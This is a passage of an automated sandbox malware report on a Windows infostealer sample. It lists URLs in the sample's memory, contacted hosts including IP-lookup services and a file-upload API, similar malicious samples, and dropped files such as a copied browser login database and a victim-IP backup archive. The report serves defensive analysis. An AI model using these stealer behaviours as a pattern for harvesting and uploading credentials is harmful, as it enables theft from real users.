                                                                                                                                                                                    https://play.google.com/?hl=en&tab=w8StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://lh3.googleusercontent.com/ogw/default-user=s96StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2449279202.000001F4EC463000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2449279202.000001F4EC431000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2449279202.000001F4EC4C3000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        http://schemas.opStL9joVVcT.exe, 00000000.00000003.2144561862.000002357FF4C000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2147975398.000002357FF1E000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2380155005.000002357FF19000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2146214184.000002357FF1E000.00000004.00000020.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000003.2145054548.000002357FF4C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://api.gofile.io/serversYStL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3E6B000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://drive.google.com/?tab=woStL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1FA000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://github.com/mono/linker/issues/1416.StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://google.com:443/StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC154000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://github.com/ericsink/SQLitePCL.rawXStL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://mail.google.com/mail/?tab=wmStL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1A9000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2CA000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1FA000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    http://www.google.2StL9joVVcT.exe, 00000000.00000002.2447138551.000001F4EB885000.00000004.00001000.00020000.00000000.sdmp, StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC154000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    http://james.newtonking.com/projects/jsonStL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3C42000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://github.com/mono/linker/issues/1981StL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://urn.to/r/sds_see23https://urn.to/r/sds_see1UInnerVerifyStL9joVVcT.exe, 00000000.00000002.2451810400.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmp, StL9joVVcT.exe, 00000000.00000000.2119710529.00007FF7E3242000.00000002.00000001.01000000.00000003.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://www.google.com/inStL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC1FA000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://gitlab.com/-/sandbox/StL9joVVcT.exe, 00000000.00000002.2447997746.000001F4EC2EF000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high

                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                              142.250.185.78
                                                                                                                                                                                                              		google.comUnited States
                                                                                                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                                                                                                              208.95.112.1
                                                                                                                                                                                                              		ip-api.comUnited States
                                                                                                                                                                                                              		53334TUT-ASUSfalse
                                                                                                                                                                                                              172.65.251.78
                                                                                                                                                                                                              		gitlab.comUnited States
                                                                                                                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                              142.250.185.228
                                                                                                                                                                                                              		www.google.comUnited States
                                                                                                                                                                                                              		15169GOOGLEUSfalse
                                                                                                                                                                                                              104.26.12.205
                                                                                                                                                                                                              		api.ipify.orgUnited States
                                                                                                                                                                                                              		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                                              Private

                                                                                                                                                                                                              IP
                                                                                                                                                                                                              127.0.0.1

                                                                                                                                                                                                              General Information

                                                                                                                                                                                                              Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                                              Analysis ID:1590651
                                                                                                                                                                                                              Start date and time:2025-01-14 12:47:10 +01:00
                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                              Overall analysis duration:0h 7m 34s
                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                              Number of analysed new started processes analysed:16
                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                              Sample name:StL9joVVcT.exe
                                                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                                                              Original Sample Name:61fde75c7a98bc432a0539a559ac0078bc91f69bccf0d899f59e3bcdcfad0471.exe
                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                              Classification:mal80.troj.spyw.winEXE@16/21@5/6
                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                              • Successful, ratio: 95%
                                                                                                                                                                                                              • Number of executed functions: 12
                                                                                                                                                                                                              • Number of non-executed functions: 93
                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                              • Found application associated with file extension: .exe

                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 52.109.32.97, 184.28.90.27, 52.109.68.129, 52.113.194.132, 52.111.236.35, 52.111.236.32, 52.111.236.34, 52.111.236.33, 20.44.10.122, 2.20.245.216, 2.20.245.225, 13.107.246.45, 40.126.32.140, 4.175.87.197
                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, eur.roaming1.live.com.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, frc-azsc-000.roaming.officeapps.live.com, officeclient.microsoft.com, templatesmetadata.office.net, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, osiprod-frc-buff-azsc-000.francecentral.cloudapp.azure.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, prod1.naturallanguageeditorservice.osi.office.net.akadns.net, nleditor.osi.office.net, onedscolprdcus02.cen
                                                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                              No simulations

                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                              IPs

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              208.95.112.16kK89mR2aq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • ip-api.com/json/8.46.123.189
                                                                                                                                                                                                              #U2800.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • ip-api.com/json/8.46.123.189
                                                                                                                                                                                                              rordendecompra_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                              findme.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                              tasAgNgjbJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • ip-api.com/json/?fields=61439
                                                                                                                                                                                                              Solara.exeGet hashmaliciousPython Stealer, Exela Stealer, XmrigBrowse
                                                                                                                                                                                                              • ip-api.com/json
                                                                                                                                                                                                              resembleC2.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                              • ip-api.com/json/?fields=225545
                                                                                                                                                                                                              F0DgoRk0p1.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                              fpY3HP2cnH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                              4287eV6mBc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                              • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                              172.65.251.78build_setup.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                              • gitlab.com/greg201/ppi3/-/raw/main/Setup.exe?inline=false

                                                                                                                                                                                                              Domains

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              gitlab.com#U2800.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 172.65.251.78
                                                                                                                                                                                                              hnskdfgjgar22.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                              • 172.65.251.78
                                                                                                                                                                                                              hnsadjhfg18De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                              • 172.65.251.78
                                                                                                                                                                                                              slifdgjsidfg19.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                              • 172.65.251.78
                                                                                                                                                                                                              De17De16.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                              • 172.65.251.78
                                                                                                                                                                                                              fghdsdf17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                              • 172.65.251.78
                                                                                                                                                                                                              hnghksdjfhs19De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                              • 172.65.251.78
                                                                                                                                                                                                              jhsdgfjkh236.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                              • 172.65.251.78
                                                                                                                                                                                                              kjhsdgGarmin17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                              • 172.65.251.78
                                                                                                                                                                                                              hngadsfkgj17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                              • 172.65.251.78
                                                                                                                                                                                                              ip-api.com6kK89mR2aq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              #U2800.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              rordendecompra_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              findme.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              tasAgNgjbJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              Solara.exeGet hashmaliciousPython Stealer, Exela Stealer, XmrigBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              resembleC2.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              F0DgoRk0p1.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              fpY3HP2cnH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              4287eV6mBc.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              api.ipify.org6kK89mR2aq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 172.67.74.152
                                                                                                                                                                                                              #U2800.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 104.26.13.205
                                                                                                                                                                                                              009.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                              • 104.26.12.205
                                                                                                                                                                                                              http://bebizicon.com/Campususa/index.xml#?email=b2xpdmllci5kb3phdEBpbm5vY2FwLmNvbQ==Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                                                                                                                                              • 172.67.74.152
                                                                                                                                                                                                              https://runescape.games/usernames.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 104.26.13.205
                                                                                                                                                                                                              rRef6010273.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                              • 172.67.74.152
                                                                                                                                                                                                              invnoIL438805.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                              • 172.67.74.152
                                                                                                                                                                                                              Shipping Docs Waybill No 2009 xxxx 351.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                              • 104.26.13.205
                                                                                                                                                                                                              rCHARTERREQUEST.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                              • 104.26.12.205
                                                                                                                                                                                                              http://clumsy-sulky-helium.glitch.me/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 104.26.12.205

                                                                                                                                                                                                              ASNs

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              CLOUDFLARENETUSzbROZPjAQ7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 104.26.12.205
                                                                                                                                                                                                              6kK89mR2aq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 172.67.74.152
                                                                                                                                                                                                              #U2800.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 104.26.13.205
                                                                                                                                                                                                              http://www.pentamx.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                              • 1.1.1.1
                                                                                                                                                                                                              PO 2025918 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                                              ABG Draft.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                              • 104.21.64.1
                                                                                                                                                                                                              RENH3RE2025QUOTE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                              • 104.21.80.1
                                                                                                                                                                                                              https://web.oncentrl.com/#/index/action?entityType=PUBLISHEDQUESTIONNAIRE&entityId=134955&actionType=PUBLISH&context=CLIENT_MGMT&recieverUserInfoId=68822Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 104.17.25.14
                                                                                                                                                                                                              random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 104.21.96.1
                                                                                                                                                                                                              https://akirapowered84501.emlnk.com/lt.php?x=3DZy~GDLVnab5KCs-Nu4WOae1qEoiN9xvxk1XaPMVXahD5B9-Uy.xuG-142imNHGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 104.17.205.31
                                                                                                                                                                                                              CLOUDFLARENETUSzbROZPjAQ7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 104.26.12.205
                                                                                                                                                                                                              6kK89mR2aq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 172.67.74.152
                                                                                                                                                                                                              #U2800.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 104.26.13.205
                                                                                                                                                                                                              http://www.pentamx.com/Get hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                              • 1.1.1.1
                                                                                                                                                                                                              PO 2025918 pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                                                              ABG Draft.scr.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                              • 104.21.64.1
                                                                                                                                                                                                              RENH3RE2025QUOTE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                                                              • 104.21.80.1
                                                                                                                                                                                                              https://web.oncentrl.com/#/index/action?entityType=PUBLISHEDQUESTIONNAIRE&entityId=134955&actionType=PUBLISH&context=CLIENT_MGMT&recieverUserInfoId=68822Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 104.17.25.14
                                                                                                                                                                                                              random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              • 104.21.96.1
                                                                                                                                                                                                              https://akirapowered84501.emlnk.com/lt.php?x=3DZy~GDLVnab5KCs-Nu4WOae1qEoiN9xvxk1XaPMVXahD5B9-Uy.xuG-142imNHGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 104.17.205.31
                                                                                                                                                                                                              TUT-ASUSzbROZPjAQ7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              6kK89mR2aq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              #U2800.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              rordendecompra_.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              findme.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              tasAgNgjbJ.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              Solara.exeGet hashmaliciousPython Stealer, Exela Stealer, XmrigBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              resembleC2.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              F0DgoRk0p1.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              fpY3HP2cnH.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                              • 208.95.112.1

                                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0ezbROZPjAQ7.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 142.250.185.78
                                                                                                                                                                                                              • 172.65.251.78
                                                                                                                                                                                                              • 142.250.185.228
                                                                                                                                                                                                              • 104.26.12.205
                                                                                                                                                                                                              6kK89mR2aq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 142.250.185.78
                                                                                                                                                                                                              • 172.65.251.78
                                                                                                                                                                                                              • 142.250.185.228
                                                                                                                                                                                                              • 104.26.12.205
                                                                                                                                                                                                              #U2800.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 142.250.185.78
                                                                                                                                                                                                              • 172.65.251.78
                                                                                                                                                                                                              • 142.250.185.228
                                                                                                                                                                                                              • 104.26.12.205
                                                                                                                                                                                                              pdf_2025 QUOTATION - #202401146778.pdf (83kb).com.exeGet hashmaliciousPureLog Stealer, QuasarBrowse
                                                                                                                                                                                                              • 142.250.185.78
                                                                                                                                                                                                              • 172.65.251.78
                                                                                                                                                                                                              • 142.250.185.228
                                                                                                                                                                                                              • 104.26.12.205
                                                                                                                                                                                                              12.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 142.250.185.78
                                                                                                                                                                                                              • 172.65.251.78
                                                                                                                                                                                                              • 142.250.185.228
                                                                                                                                                                                                              • 104.26.12.205
                                                                                                                                                                                                              https://cys-bombasml.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 142.250.185.78
                                                                                                                                                                                                              • 172.65.251.78
                                                                                                                                                                                                              • 142.250.185.228
                                                                                                                                                                                                              • 104.26.12.205
                                                                                                                                                                                                              UoEDaAjHGW.exeGet hashmaliciousPureLog Stealer, QuasarBrowse
                                                                                                                                                                                                              • 142.250.185.78
                                                                                                                                                                                                              • 172.65.251.78
                                                                                                                                                                                                              • 142.250.185.228
                                                                                                                                                                                                              • 104.26.12.205
                                                                                                                                                                                                              009.vbeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                              • 142.250.185.78
                                                                                                                                                                                                              • 172.65.251.78
                                                                                                                                                                                                              • 142.250.185.228
                                                                                                                                                                                                              • 104.26.12.205
                                                                                                                                                                                                              RFQ.exeGet hashmaliciousQuasar, PureLog StealerBrowse
                                                                                                                                                                                                              • 142.250.185.78
                                                                                                                                                                                                              • 172.65.251.78
                                                                                                                                                                                                              • 142.250.185.228
                                                                                                                                                                                                              • 104.26.12.205
                                                                                                                                                                                                              PI ITS15235.docGet hashmaliciousDBatLoader, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                              • 142.250.185.78
                                                                                                                                                                                                              • 172.65.251.78
                                                                                                                                                                                                              • 142.250.185.228
                                                                                                                                                                                                              • 104.26.12.205

                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              C:\Users\user\Desktop\e_sqlite3.dll#U2800.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                                                C:\Users\Public\Documents\638724340810195450\Default_LoginDataTemp.db

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:high, very likely benign file
                                                                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                C:\Users\Public\Documents\638724340810195450\Files\D\hwcompat.txt

                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\StL9joVVcT.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):751624
                                                                                                                                                                                                                Entropy (8bit):4.941596949315087
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3072:5CgixLwQcUHW0tKouM4kD+nRzkSv9N+VYuhras4V:AgixLIUHW0tK7MmkSv9w/tas4
                                                                                                                                                                                                                MD5:FBF37B8B1EE4640B1C470F2F07A80E4A
                                                                                                                                                                                                                SHA1:B239C5499FA63D397C3DD35A7F605CE86D91B44B
                                                                                                                                                                                                                SHA-256:E21DB717F31F9465420E6354BAA5AFAEAA3521DEB885ED46BC90530AEE9FFD20
                                                                                                                                                                                                                SHA-512:F9439E2D7B63825FE812EE380F1EF8B277D50EED706B6ABE4B8563423891FF425A00083E88626084EE493376F1DA742ECD73B6B5F892E001C4F9048C7D3AC36C
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                                                                                                Preview:HwCompat V4....1394.inf:..PCI\CC_0C0010..PCI\VEN_10CF&CC_0C0010..PCI\VEN_11C1&CC_0C0010..PCI\VEN_100B&DEV_000F..PCI\VEN_100B&CC_0C0010..PCI\VEN_1033&DEV_0063..PCI\VEN_1033&CC_0C0010..PCI\VEN_1180&CC_0C0010..PCI\VEN_104D&DEV_8039..PCI\VEN_104D&DEV_8039&REV_03..PCI\VEN_104C&DEV_8009..PCI\VEN_104C&DEV_8019..PCI\VEN_104C&CC_0C0010..PCI\VEN_104C&DEV_8009&SUBSYS_8032104D..PCI\VEN_1106&DEV_3044..PCI\VEN_1106&CC_0C0010....3ware.inf:..PCI\VEN_13C1&DEV_1010&SUBSYS_000113C1....55fpgafirmware.inf:..UEFI\RES_{C907D5F6-BBE9-47EE-B76B-5E28C7F9FC63}....55niosfirmware.inf:..UEFI\RES_{06B75ADA-B0E1-46BA-BB3B-4D6E4A0F2CB1}....55smcappfirmware.inf:..UEFI\RES_{364D032C-0041-48A6-A26F-62388D97FC6C}....55smcbootfirmware.inf:..UEFI\RES_{DA50CBA0-8F33-4B66-8A3A-08F84015C33F}....55stguestfirmware.inf:..UEFI\RES_{4E11B2F5-AF26-49D5-A549-72AE52345E22}....55stoutfirmware.inf:..UEFI\RES_{7E2BEABF-4BE5-4C10-AF9C-4C1A69E06033}....55stpcfirmware.inf:..UEFI\RES_{296EFE23-EB18-42EE-8B12-51489B27232A}....55sttouchbackgue

                                                                                                                                                                                                                C:\Users\Public\Documents\Backup_[United States]_8.46.123.189_[1401].zip

                                                                                                                                                                                                                Download File
